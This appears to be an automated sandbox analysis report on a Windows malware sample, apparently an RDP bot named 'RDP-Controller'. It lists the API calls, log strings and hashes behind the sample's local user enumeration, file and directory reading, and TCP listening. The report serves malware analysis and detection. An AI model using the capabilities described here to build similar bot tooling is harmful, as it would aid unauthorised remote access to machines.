Opcode Fuzzy Hash: 1e66a750eef62416fe29ac226196076c421e718d702112074ece5bc511332d35
Instruction Fuzzy Hash: A2F0BB66808F8482D211AF18E4002ABB375FF9E789F605326EFC966625DF29D5568B40

Analysis Process: 73tsjpnle0jv48sgryqfs6ph8t.exePID: 6248, Parent PID: 5232COMMON

Executed Functions

Function 00007FF7103612FD Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2335073990.00007FF710361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF710360000, based on PE: true

Associated: 0000000C.00000002.2335056235.00007FF710360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2335094214.00007FF710370000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2335094214.00007FF71096C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2335094214.00007FF71096E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2335956069.00007FF710D7E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2335993484.00007FF710D86000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2335993484.00007FF710D88000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2336038052.00007FF710D89000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2336058452.00007FF710D8C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff710360000_73tsjpnle0jv48sgryqfs6ph8t.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4189dc0bd0b40e525df6bacc68198785b1c73d26038d43092f54cabf3c1e858b
Instruction ID: acfdbfeba5e920e41a7cb29d1c3103c7b7a8557eec3918df0ef0b0d8e3a368c3
Opcode Fuzzy Hash: 4189dc0bd0b40e525df6bacc68198785b1c73d26038d43092f54cabf3c1e858b
Instruction Fuzzy Hash: 52B01234A04A4584E3003F05D84325C77307B05710FC24035C50C13362CF7C70484B30

Analysis Process: main.exePID: 2656, Parent PID: 620COMMON

Execution Graph

Execution Coverage:	6.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.3%
Total number of Nodes:	2000
Total number of Limit Nodes:	28

Executed Functions

Function 00007FFE11506DA3 Relevance: 54.6, APIs: 23, Strings: 8, Instructions: 332
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FFE115040D2: fwrite.MSVCRT ref: 00007FFE1150417E
Part of subcall function 00007FFE115040D2: fflush.MSVCRT ref: 00007FFE1150418A

LocalAlloc.KERNEL32 ref: 00007FFE11506DD8
wcsncpy.MSVCRT ref: 00007FFE11506E06
LookupAccountNameW.ADVAPI32 ref: 00007FFE11506E63
GetLastError.KERNEL32 ref: 00007FFE11506E75
GetLastError.KERNEL32 ref: 00007FFE11506EBE
LocalAlloc.KERNEL32 ref: 00007FFE11506EED
LookupAccountNameW.ADVAPI32 ref: 00007FFE11506F29
LocalFree.KERNEL32 ref: 00007FFE11506F36
GetLastError.KERNEL32 ref: 00007FFE11506F41

Part of subcall function 00007FFE115040D2: EnterCriticalSection.KERNEL32 ref: 00007FFE115041A3
Part of subcall function 00007FFE115040D2: LeaveCriticalSection.KERNEL32 ref: 00007FFE115041CB
Part of subcall function 00007FFE115040D2: CopyFileA.KERNEL32 ref: 00007FFE11504228

GetProcessHeap.KERNEL32 ref: 00007FFE11507234
HeapAlloc.KERNEL32 ref: 00007FFE11507245

Strings

[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE11506DAD, 00007FFE11507262
[E] (%s) -> ConvertSidToStringSid failed(gle=%lu), xrefs: 00007FFE115070D1
users_sync, xrefs: 00007FFE11506E80, 00007FFE11506ECC, 00007FFE11506F4C, 00007FFE115070A9
[E] (%s) -> LookupAccountNameW failed(gle=%lu), xrefs: 00007FFE11506E87, 00007FFE11506ED3, 00007FFE11506F53
D, xrefs: 00007FFE11506DF5
mem_alloc, xrefs: 00007FFE11506DA6, 00007FFE1150725B
sid_to_str, xrefs: 00007FFE115070CA
[D] (%s) -> User found(name=%s,s_sid=%s,acct_expires=%x,last_logon=%x), xrefs: 00007FFE115070B0

Memory Dump Source

Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd

Similarity

API ID: AllocErrorLastLocal$AccountCriticalHeapLookupNameSection$CopyEnterFileFreeLeaveProcessfflushfwritewcsncpy
String ID: D$[D] (%s) -> User found(name=%s,s_sid=%s,acct_expires=%x,last_logon=%x)$[E] (%s) -> ConvertSidToStringSid failed(gle=%lu)$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$sid_to_str$users_sync
API String ID: 3624467404-104752423
Opcode ID: 9aa9ad2c1c237d990a9e3d50bdb71c766015b0657cd4d8b527c9b81fa173bfe5
Instruction ID: 718e88dedde31bd943eb05f96d3132dae591e333a2d1d633c9673e32d2f86b8f
Opcode Fuzzy Hash: 9aa9ad2c1c237d990a9e3d50bdb71c766015b0657cd4d8b527c9b81fa173bfe5
Instruction Fuzzy Hash: 45F1A162A0DE0286FB60CB96E44437D23AAEF84764F2540BAD58D477B8DF7CE885C711

Function 00007FF7C1AB47A3 Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 159fileCOMMON

Download Yara Rule

APIs

FindNextFileA.KERNELBASE ref: 00007FF7C1AB47E9
_mbscpy.MSVCRT ref: 00007FF7C1AB4804
FindFirstFileA.KERNEL32 ref: 00007FF7C1AB48D7
GetLastError.KERNEL32 ref: 00007FF7C1AB48F3
GetLastError.KERNEL32 ref: 00007FF7C1AB4922
FindClose.KERNEL32 ref: 00007FF7C1AB4940

Part of subcall function 00007FF7C1AB2EF2: fwrite.MSVCRT ref: 00007FF7C1AB2F9E
Part of subcall function 00007FF7C1AB2EF2: fflush.MSVCRT ref: 00007FF7C1AB2FAA

Strings

(path != NULL), xrefs: 00007FF7C1AB4839
(name != NULL), xrefs: 00007FF7C1AB4871
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF7C1AB4847, 00007FF7C1AB487F, 00007FF7C1AB48B7
[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu), xrefs: 00007FF7C1AB4914
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF7C1AB4832, 00007FF7C1AB486A, 00007FF7C1AB48A2
(resume_handle != NULL), xrefs: 00007FF7C1AB48A9
[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu), xrefs: 00007FF7C1AB4958
fs_dir_list, xrefs: 00007FF7C1AB4840, 00007FF7C1AB4878, 00007FF7C1AB48B0, 00007FF7C1AB490D, 00007FF7C1AB4951

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: Find$ErrorFileLast$CloseFirstNext_mbscpyfflushfwrite
String ID: (name != NULL)$(path != NULL)$(resume_handle != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu)$[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu)$fs_dir_list
API String ID: 1094913617-1535167640
Opcode ID: 43008a9097aef54c61343347f13780d481088604d2dbe84fe1aabf1f4a312499
Instruction ID: 93f96b002874fb7f547bac6107e8a4654fd89245ca54c358215d82b50c78a052
Opcode Fuzzy Hash: 43008a9097aef54c61343347f13780d481088604d2dbe84fe1aabf1f4a312499
Instruction Fuzzy Hash: 54610875E0C5D389FB60BE94A454BBCA2546F013B8FD40133DCAE9B291DEADA848D361

Function 00007FFE11EC5BF3 Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 159filestringCOMMON

Download Yara Rule

APIs

FindNextFileA.KERNEL32 ref: 00007FFE11EC5C39
strcpy.MSVCRT ref: 00007FFE11EC5C54
FindFirstFileA.KERNEL32 ref: 00007FFE11EC5D27
GetLastError.KERNEL32 ref: 00007FFE11EC5D43
GetLastError.KERNEL32 ref: 00007FFE11EC5D72
FindClose.KERNEL32 ref: 00007FFE11EC5D90

Part of subcall function 00007FFE11EC9DC2: fwrite.MSVCRT ref: 00007FFE11EC9E6E
Part of subcall function 00007FFE11EC9DC2: fflush.MSVCRT ref: 00007FFE11EC9E7A

Strings

fs_dir_list, xrefs: 00007FFE11EC5C90, 00007FFE11EC5CC8, 00007FFE11EC5D00, 00007FFE11EC5D5D, 00007FFE11EC5DA1
[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu), xrefs: 00007FFE11EC5DA8
(resume_handle != NULL), xrefs: 00007FFE11EC5CF9
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE11EC5C97, 00007FFE11EC5CCF, 00007FFE11EC5D07
[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu), xrefs: 00007FFE11EC5D64
(name != NULL), xrefs: 00007FFE11EC5CC1
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE11EC5C82, 00007FFE11EC5CBA, 00007FFE11EC5CF2
(path != NULL), xrefs: 00007FFE11EC5C89

Memory Dump Source

Source File: 00000017.00000002.2670746412.00007FFE11EC1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000017.00000002.2670719444.00007FFE11EC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670780662.00007FFE11ED3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670837201.00007FFE11EDC000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670908320.00007FFE11EDF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2670942185.00007FFE11EE0000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd

Similarity

API ID: Find$ErrorFileLast$CloseFirstNextfflushfwritestrcpy
String ID: (name != NULL)$(path != NULL)$(resume_handle != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu)$[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu)$fs_dir_list
API String ID: 4253334766-1535167640
Opcode ID: 19d7847e648ae9034f0efa555709a140e90b851bab03b7f92ee852e7e2957829
Instruction ID: 2fccb24f7821c386b6d476c11bf9cb866100817d59ea4999e9c4f0aa39bd0395
Opcode Fuzzy Hash: 19d7847e648ae9034f0efa555709a140e90b851bab03b7f92ee852e7e2957829
Instruction Fuzzy Hash: FB613A21F0CE4389FB249B96AC043BB2258AF103B5FD451B2E86E5B2F4DE6CF9458741

Function 00007FFE11506D5F Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 167memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE11506C7F: GetProcessHeap.KERNEL32 ref: 00007FFE11506CCD
Part of subcall function 00007FFE11506C7F: HeapFree.KERNEL32 ref: 00007FFE11506CDE
Part of subcall function 00007FFE11506C7F: GetProcessHeap.KERNEL32 ref: 00007FFE11506CF2
Part of subcall function 00007FFE11506C7F: HeapFree.KERNEL32 ref: 00007FFE11506D03
Part of subcall function 00007FFE11506C7F: LocalFree.KERNEL32 ref: 00007FFE11506D19
Part of subcall function 00007FFE11506C7F: GetProcessHeap.KERNEL32 ref: 00007FFE11506D2D
Part of subcall function 00007FFE11506C7F: HeapFree.KERNEL32 ref: 00007FFE11506D3E

NetApiBufferFree.NETAPI32 ref: 00007FFE11507283
NetUserEnum.NETAPI32 ref: 00007FFE115072F9
GetProcessHeap.KERNEL32 ref: 00007FFE11507337
HeapAlloc.KERNEL32 ref: 00007FFE11507348
memcpy.MSVCRT ref: 00007FFE11507385
GetProcessHeap.KERNEL32 ref: 00007FFE1150738A
HeapFree.KERNEL32 ref: 00007FFE1150739B

Strings

[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE115073EA
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE11506D8D
users_sync, xrefs: 00007FFE115073E3, 00007FFE1150740C, 00007FFE11507521
[I] (%s) -> Done(sam_user_num=%u), xrefs: 00007FFE11507528
mem_alloc, xrefs: 00007FFE11506D86
[E] (%s) -> NetUserEnum failed(enum_err=%08lx), xrefs: 00007FFE11507413

Memory Dump Source

Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd

Similarity

API ID: Heap$Free$Process$AllocBufferEnumLocalUsermemcpy
String ID: [E] (%s) -> Failed(err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> NetUserEnum failed(enum_err=%08lx)$[I] (%s) -> Done(sam_user_num=%u)$mem_alloc$users_sync
API String ID: 1987963910-3382179125
Opcode ID: 9413801b513f742f34c6a683bec4ac20b7e269b55b5f64348b2d2939899f8447
Instruction ID: c9c3a4d2761c7c3190449f70770ace468e89e56a19a2f246c94831d166e3211e
Opcode Fuzzy Hash: 9413801b513f742f34c6a683bec4ac20b7e269b55b5f64348b2d2939899f8447
Instruction Fuzzy Hash: CE618021A0CE4786FB619B96E8413BD6759AF803B4F2500B9DD8D076B0EF7DE985C301

Function 00007FFE126E28BA Relevance: 22.8, APIs: 8, Strings: 5, Instructions: 89networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 00007FFE126E28D8
WSAGetLastError.WS2_32 ref: 00007FFE126E29C2

Part of subcall function 00007FFE126E27EA: setsockopt.WS2_32 ref: 00007FFE126E281A

htonl.WS2_32 ref: 00007FFE126E290A
htons.WS2_32 ref: 00007FFE126E291B
bind.WS2_32 ref: 00007FFE126E2934
listen.WS2_32 ref: 00007FFE126E2949
WSAGetLastError.WS2_32 ref: 00007FFE126E295A

Part of subcall function 00007FFE126E2072: fwrite.MSVCRT ref: 00007FFE126E211E
Part of subcall function 00007FFE126E2072: fflush.MSVCRT ref: 00007FFE126E212A

WSAGetLastError.WS2_32 ref: 00007FFE126E2984

Strings

[E] (%s) -> listen failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFE126E2976
tcp_listen, xrefs: 00007FFE126E296F, 00007FFE126E2999, 00007FFE126E29D3, 00007FFE126E2A07
[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFE126E29DA
[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u), xrefs: 00007FFE126E2A0E
[E] (%s) -> bind failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFE126E29A0

Memory Dump Source

Source File: 00000017.00000002.2671030736.00007FFE126E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE126E0000, based on PE: true

Associated: 00000017.00000002.2670977304.00007FFE126E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671084429.00007FFE126F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671113512.00007FFE126F8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671163310.00007FFE126FB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671195288.00007FFE126FC000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126e0000_main.jbxd

Similarity

API ID: ErrorLast$bindfflushfwritehtonlhtonslistensetsockoptsocket
String ID: [E] (%s) -> bind failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> listen failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$tcp_listen
API String ID: 3590747132-3524496754
Opcode ID: 03c5a1b98310e94ddef1aada299942bcfeba41f601d884b0c1ee0b5bb044904e
Instruction ID: 411bc69ec874916818c6e520e04ccc7e5cac15e7efb2ef54dc357032bc706950
Opcode Fuzzy Hash: 03c5a1b98310e94ddef1aada299942bcfeba41f601d884b0c1ee0b5bb044904e
Instruction Fuzzy Hash: 7F31A221A08E0689EF209B27EC102B57691BF587B4F1413B5D9BE436F8EEBCE805C704

Function 00007FF7C1AB1DBC Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 120stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FF7C1AB1DD4
strcmp.MSVCRT ref: 00007FF7C1AB1DE7
StartServiceCtrlDispatcherA.ADVAPI32 ref: 00007FF7C1AB1E23
_read.MSVCRT ref: 00007FF7C1AB1E79
GetLastError.KERNEL32 ref: 00007FF7C1AB1E98

Part of subcall function 00007FF7C1AB1A63: FreeLibrary.KERNEL32(?,?,00000000,00000157C50713D0,00007FF7C1AB1E50,?,?,?,?,?,?,00000001,00007FF7C1AB1FC3,?,?,00007FF7C1AC8508), ref: 00007FF7C1AB1AA1
Part of subcall function 00007FF7C1AB1A63: GetProcessHeap.KERNEL32(?,?,00000000,00000157C50713D0,00007FF7C1AB1E50,?,?,?,?,?,?,00000001,00007FF7C1AB1FC3,?,?,00007FF7C1AC8508), ref: 00007FF7C1AB1AD4
Part of subcall function 00007FF7C1AB1A63: HeapFree.KERNEL32(?,?,00000000,00000157C50713D0,00007FF7C1AB1E50,?,?,?,?,?,?,00000001,00007FF7C1AB1FC3,?,?,00007FF7C1AC8508), ref: 00007FF7C1AB1AE5

Part of subcall function 00007FF7C1AB1B1C: GetProcessHeap.KERNEL32(?,?,00000000,00007FF7C1AB1E55,?,?,?,?,?,?,00000001,00007FF7C1AB1FC3,?,?,00007FF7C1AC8508,00000000), ref: 00007FF7C1AB1B4D
Part of subcall function 00007FF7C1AB1B1C: HeapFree.KERNEL32(?,?,00000000,00007FF7C1AB1E55,?,?,?,?,?,?,00000001,00007FF7C1AB1FC3,?,?,00007FF7C1AC8508,00000000), ref: 00007FF7C1AB1B5E

Strings

service, xrefs: 00007FF7C1AB1DDD, 00007FF7C1AB1E37
[E] (%s) -> StartServiceCtrlDispatcherA failed(GetLastError=%lu), xrefs: 00007FF7C1AB1EAA
RDP-Controller, xrefs: 00007FF7C1AB1DF4
standalone, xrefs: 00007FF7C1AB1DCA
[E] (%s) -> No a valid run mode(mode=%s), xrefs: 00007FF7C1AB1F8B
main, xrefs: 00007FF7C1AB1EA3, 00007FF7C1AB1F84

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: Heap$Free$Processstrcmp$CtrlDispatcherErrorLastLibraryServiceStart_read
String ID: RDP-Controller$[E] (%s) -> No a valid run mode(mode=%s)$[E] (%s) -> StartServiceCtrlDispatcherA failed(GetLastError=%lu)$main$service$standalone
API String ID: 3617873859-308889057
Opcode ID: cc0dc7e073174fff5213ad5aad2aa001b37d6c82f68193b81f7804c074e2ded8
Instruction ID: 55dbd16e3c830658aa3537c7ca41d9acc893f87856edf9ec4e123575f4ff44c6
Opcode Fuzzy Hash: cc0dc7e073174fff5213ad5aad2aa001b37d6c82f68193b81f7804c074e2ded8
Instruction Fuzzy Hash: AE51E775A0C68385FB60BF21B490B7DD2919F263A4FD40533DE4E47292EF9DE945C222

Function 00007FF7C1AB1131 Relevance: 13.6, APIs: 9, Instructions: 120sleepstringCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,?,00007FF7C1AB1313), ref: 00007FF7C1AB116E
_amsg_exit.MSVCRT(?,?,?,00007FF7C1AB1313), ref: 00007FF7C1AB118D
_initterm.MSVCRT ref: 00007FF7C1AB11AE
_initterm.MSVCRT ref: 00007FF7C1AB11D3
SetUnhandledExceptionFilter.KERNEL32(?,?,?,00007FF7C1AB1313), ref: 00007FF7C1AB1212
malloc.MSVCRT ref: 00007FF7C1AB1244
strlen.MSVCRT ref: 00007FF7C1AB125C
malloc.MSVCRT ref: 00007FF7C1AB1268
_cexit.MSVCRT(?,?,?,00007FF7C1AB1313), ref: 00007FF7C1AB12E3

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: _inittermmalloc$ExceptionFilterSleepUnhandled_amsg_exit_cexitstrlen
String ID:
API String ID: 3714283218-0
Opcode ID: a8064edad5975ffa8ddaf6c1b07911e7f079fd9c5a4557f8d4210bda645fea64
Instruction ID: 37f0e2fc44bad5b75d9448d804bfb202b0a22f16963eca52a8324fc8d4c0f541
Opcode Fuzzy Hash: a8064edad5975ffa8ddaf6c1b07911e7f079fd9c5a4557f8d4210bda645fea64
Instruction Fuzzy Hash: 07510775A09A8689EB54FF15F860A7DA2A0BF45BB4F844437CD0E47391DEBDE440C360

Function 00007FFE11505EEA Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 50networkCOMMON

Download Yara Rule

APIs

recv.WS2_32 ref: 00007FFE11505F12
WSAGetLastError.WS2_32 ref: 00007FFE11505F2C

Strings

tcp_recv, xrefs: 00007FFE11505F46, 00007FFE11505F5E, 00007FFE11505F83
[D] (%s) -> Disconnected(sock=0x%llx), xrefs: 00007FFE11505F65
[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d), xrefs: 00007FFE11505F8A
[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE11505F4D

Memory Dump Source

Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd

Similarity

API ID: ErrorLastrecv
String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
API String ID: 2514157807-65069805
Opcode ID: 435ce618383da7af3460339fe909699e16c0bdc00b3bb9c3a5e4a1d0c95da3f5
Instruction ID: d0048a4ce88e2e493fcae1957da0260c666fb9b61103d9d85128ca9d66e268aa
Opcode Fuzzy Hash: 435ce618383da7af3460339fe909699e16c0bdc00b3bb9c3a5e4a1d0c95da3f5
Instruction Fuzzy Hash: 9B118CA0F1CD0791F71157A7A8902BC1259AF057B8F8017BCED3D9A6F5DE9CA916C300

Function 00007FF7C1AB4FC5 Relevance: 72.0, APIs: 24, Strings: 17, Instructions: 298
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fopen.MSVCRT ref: 00007FF7C1AB500A
fseek.MSVCRT ref: 00007FF7C1AB5029
_errno.MSVCRT ref: 00007FF7C1AB503D
_errno.MSVCRT ref: 00007FF7C1AB5058
_errno.MSVCRT ref: 00007FF7C1AB5117

Part of subcall function 00007FF7C1AB2EF2: fwrite.MSVCRT ref: 00007FF7C1AB2F9E
Part of subcall function 00007FF7C1AB2EF2: fflush.MSVCRT ref: 00007FF7C1AB2FAA

_errno.MSVCRT ref: 00007FF7C1AB5132
_errno.MSVCRT ref: 00007FF7C1AB517F
fclose.MSVCRT ref: 00007FF7C1AB5520

Strings

[E] (%s) -> fseek(SEEK_END) failed(path=%s,errno=%d), xrefs: 00007FF7C1AB504C
(path != NULL), xrefs: 00007FF7C1AB5086
NULL, xrefs: 00007FF7C1AB5589
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF7C1AB555C
mem_alloc, xrefs: 00007FF7C1AB53E4
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF7C1AB5094, 00007FF7C1AB50C7, 00007FF7C1AB50FA
[I] (%s) -> Done(path=%s,buf_sz=%llu), xrefs: 00007FF7C1AB559F
[E] (%s) -> fopen failed(path=%s,errno=%d), xrefs: 00007FF7C1AB5126
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FF7C1AB53EB
fs_file_read, xrefs: 00007FF7C1AB5045, 00007FF7C1AB508D, 00007FF7C1AB50C0, 00007FF7C1AB50F3, 00007FF7C1AB511F, 00007FF7C1AB522A, 00007FF7C1AB5340, 00007FF7C1AB540B, 00007FF7C1AB54CA, 00007FF7C1AB5555, 00007FF7C1AB5598
[E] (%s) -> fread failed(path=%s,errno=%d), xrefs: 00007FF7C1AB5412
(((*buf) == NULL) || ((*buf_sz) > 0)), xrefs: 00007FF7C1AB50EC
[E] (%s) -> ftell failed(path=%s,errno=%d), xrefs: 00007FF7C1AB5231
[E] (%s) -> fseek(SEEK_SET) failed(path=%s,errno=%d), xrefs: 00007FF7C1AB5347
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF7C1AB507F, 00007FF7C1AB50B2, 00007FF7C1AB50E5
[E] (%s) -> fread undone(path=%s,l=%ld,n=%ld), xrefs: 00007FF7C1AB54D1
(buf_sz != NULL), xrefs: 00007FF7C1AB50B9

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

